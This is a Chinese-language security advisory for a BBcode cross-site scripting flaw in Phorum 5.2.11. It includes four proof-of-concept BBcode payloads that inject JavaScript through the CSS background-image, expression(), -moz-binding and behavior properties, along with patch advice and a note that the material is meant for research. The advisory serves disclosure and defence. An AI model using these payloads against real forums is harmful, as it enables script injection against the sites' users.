影響版本: Phorum 5.2.11

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB論壇程序，可在Linux和Unix操作系統下使用，也可在Microsoft Windows操作系統下使用。  Phorum的過濾引擎沒有充分地驗證某些BBcode參數，遠程攻擊者可以在所提交的請求中使用導致注入并執行惡意JavaScript代碼。<*參考   crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

測試方法: [www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建議: 廠商補丁： Phorum

目前廠商已經發布了升級補丁以修復這個安全問題。

請到廠商的主頁下載： http://www.phorum.org/phorum5/read.php?64,139411

【編輯推薦】

1. Macromedia ColdFusion日志條目HTML注入漏洞
2. 多家廠商的web漏洞掃描程序存在HTML注入漏洞
3. Rockliffe 郵件信息HTML注入漏洞